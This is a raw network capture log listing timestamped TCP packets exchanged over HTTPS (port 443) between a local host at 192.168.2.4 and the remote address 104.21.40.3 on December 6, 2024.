                                              Dec 6, 2024 22:19:37.662970066 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.670310020 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.676510096 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.676603079 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.676616907 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.676628113 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.676687956 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.682751894 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.689018965 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.689047098 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.689073086 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.689080954 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.689122915 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.793127060 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.795926094 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.795986891 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.796005964 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.802182913 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.802242994 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.802248955 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.808434963 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.808484077 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.808490992 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.814640045 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.814696074 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.814703941 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.820846081 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.820895910 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.820903063 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.827192068 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.827251911 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.827260017 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.827332020 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.833256960 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.839462042 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.839510918 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.839518070 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.851934910 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.852130890 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.852138996 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.852191925 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.858253002 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.858328104 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.866913080 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.867057085 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.867063046 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.871392012 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.871452093 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.871459007 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.875773907 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.875828028 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.875835896 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.880093098 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.880147934 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.880153894 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.888885021 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.888969898 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.888977051 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.889020920 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.897519112 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.897619009 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.904187918 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.904261112 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.912843943 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.912925005 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.921546936 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.921613932 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.921668053 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.921717882 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.987139940 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.987226009 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.987234116 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.987292051 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.992996931 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.993088961 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.001570940 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.001672029 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.001678944 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.001724958 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.005768061 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.005837917 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.009705067 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.009768963 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.017493963 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.017585039 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.017590046 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.017642021 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.021544933 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.021619081 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.025490046 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.025569916 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.033298016 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.033373117 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.037285089 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.037344933 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.041161060 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.041234970 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.044318914 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.044378996 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.047427893 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.047485113 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.053486109 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.053563118 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.056977987 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.057029009 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.060623884 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.060697079 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.060777903 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.062647104 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.062695980 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.062719107 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.064394951 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.064461946 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.064476967 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.069861889 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.069960117 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.069976091 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.071677923 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.071724892 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.071738958 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.075193882 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.075263023 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.075279951 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.076984882 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.077029943 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.077044010 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.078902960 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.078943968 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.078958988 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.080645084 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.080698013 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.080710888 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.081680059 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.081722021 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.081732035 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.083488941 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.083534002 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.083545923 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.085335970 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.085391998 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.085406065 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.088860035 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.088932037 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.088949919 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.088992119 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.092444897 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.092509031 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.094257116 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.094310045 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.097958088 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.098042965 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.105233908 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.105315924 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.106043100 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.106101990 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.107846975 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.107913017 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.177397013 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.177498102 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.178239107 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.178308964 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.180061102 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.180128098 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.183576107 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.183633089 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.194796085 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.194824934 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.194905996 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.194917917 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.194974899 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.196417093 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.196470022 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.208002090 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.208020926 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.208101034 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.208108902 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.208152056 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.211400032 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.211508989 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.222848892 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.222944975 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.222991943 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.222995996 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.223012924 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.231812000 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.231829882 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.231899023 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.231905937 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.238322973 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.238341093 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.238413095 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.238425970 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.242017031 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.242055893 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.242106915 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.242114067 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.242151022 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.243031025 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.243087053 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.244793892 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.244844913 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.245852947 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.245930910 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.249414921 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.249485970 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.369817019 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.369977951 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.370887041 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.370965958 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.375492096 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.375536919 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.375583887 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.375588894 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.375602961 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.377187967 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.377250910 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.377259016 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.377300978 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.378279924 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.378340006 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.381067991 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.381133080 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.382905960 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.382962942 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.384850979 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.384922028 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.391128063 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.391163111 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.391195059 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.391199112 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.391243935 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.391262054 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.392968893 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.393038034 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.398729086 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.398746967 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.398823023 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.398830891 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.398871899 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.400612116 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.400667906 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.401968002 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.402021885 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.408345938 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.408364058 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.408425093 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.408431053 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.408469915 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.420600891 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.420624971 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.420711994 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.420720100 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.420764923 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.561975002 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.562016010 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.562076092 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.562083960 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.562117100 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.563946009 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.564011097 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.564018011 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.564059019 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.566600084 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.566660881 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.573093891 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.573112011 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.573167086 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.573173046 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.578830004 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.578851938 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.578907967 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.578917027 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.578927040 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.585319996 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.585335970 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.585397959 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.585410118 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.591680050 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.591705084 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.591749907 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.591758013 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.591780901 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.596950054 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.596990108 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.597023964 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.597028971 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.597052097 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.602519035 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.602538109 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.602595091 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.602605104 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.602646112 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.614087105 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.614108086 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.614200115 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.614207029 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.614250898 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.754415035 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.754559994 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.756968975 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.757153988 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.760704994 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.760806084 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.760816097 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.760868073 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.763648033 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.763714075 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.763720989 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.769961119 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.769978046 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.770035028 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.770044088 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.776520967 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.776535988 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.776596069 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.776603937 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.776642084 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.782320023 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.782334089 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.782387972 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.782394886 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.784084082 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.784140110 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.784147024 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.788090944 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.788129091 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.788155079 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.788161039 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.788209915 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.791807890 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.791845083 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.791881084 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.791889906 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.791990042 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.795528889 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.795572042 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.795594931 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.795599937 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.795638084 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.805957079 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.805999041 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.806031942 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.806035995 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.806086063 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.946182966 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.946230888 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:38.946295977 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:38.946300983 CET44349730104.21.40.3192.168.2.4
